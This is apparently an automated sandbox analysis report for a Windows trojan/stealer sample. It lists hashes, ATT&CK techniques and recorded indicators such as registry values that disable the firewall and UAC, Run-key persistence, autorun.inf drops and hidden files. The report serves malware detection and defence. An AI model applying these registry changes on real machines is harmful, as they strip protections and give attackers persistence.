b2f9228bc717b88b83c990ebcb8e30dafd7748e1c927c23a305ac8ec29298039

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
21-09-2024 05:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
Size

275KB
MD5

ef1d48e8226e491133525df0e4d44dea
SHA1

16295c3ea0c8ba71edf39bc2627093d7c4a64cfc
SHA256

b2f9228bc717b88b83c990ebcb8e30dafd7748e1c927c23a305ac8ec29298039
SHA512

d2d701ea7ec2edccf334c57295ef4fe055ad3607772424c0194295ddd3a8c4a783586462afc48a36ce3a8174997ce4c4cf11676b65453e0da878c9edc2b9c3b6
SSDEEP

6144:8gSQqtvFsS/Q4zFFlm/RyPMgTC4j/a/1tU/hbRu3:1Sxt9zQ4zFFlm/MP1TbwHUS

Score

10^/10

defense_evasion discovery evasion persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

Modifies firewall policy service 3 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1404	netsh.exe
1808	netsh.exe
4376	netsh.exe
4188	netsh.exe

Sets file to hidden 1 TTPs 10 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2964	attrib.exe
2356	attrib.exe
2168	attrib.exe
3936	attrib.exe
2124	attrib.exe
4464	attrib.exe
2084	attrib.exe
2640	attrib.exe
2496	attrib.exe
3512	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe

Loads dropped DLL 3 IoCs

pid	Process
5100	IEXPLORE.EXE
4260	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3564	IEXPLORE.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3036-0-0x0000000000590000-0x00000000005E4000-memory.dmp	upx
behavioral2/memory/3036-8-0x0000000000590000-0x00000000005E4000-memory.dmp	upx
behavioral2/files/0x00080000000234b5-14.dat	upx
behavioral2/memory/4260-27-0x0000000000590000-0x00000000005E4000-memory.dmp	upx
behavioral2/memory/3036-218-0x0000000000590000-0x00000000005E4000-memory.dmp	upx
behavioral2/memory/4260-426-0x0000000000590000-0x00000000005E4000-memory.dmp	upx

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\system32\\sysrunc.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe"	IEXPLORE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\System32\\sysrunc.exe"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\system32\\sysrunc.exe"	reg.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	IEXPLORE.EXE
File created	F:\autorun.inf	IEXPLORE.EXE
File created	D:\autorun.inf	IEXPLORE.EXE
File opened for modification	C:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\sysrunc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	attrib.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2284	sc.exe
4660	sc.exe
4808	sc.exe
1012	sc.exe
2044	sc.exe
2024	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Control Panel 4 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60"	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\ScreenSaveActive = "1"	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60"	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\ScreenSaveActive = "1"	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 53 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3557090515"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_StatusBar = "yes"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31132643"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "433660051"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3557090515"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{FF8D0B73-77D6-11EF-939B-F60A6DD2E828} = "0"	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT = "0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_URLinStatusBar = "yes"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3560528450"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT = "0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_StatusBar = "yes"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\MINIE	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MINIE\ShowStatusBar = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_URLinStatusBar = "yes"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132643"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MINIE\ShowStatusBar = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_FullURL = "yes"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\MINIE	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132643"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_FullURL = "yes"	reg.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
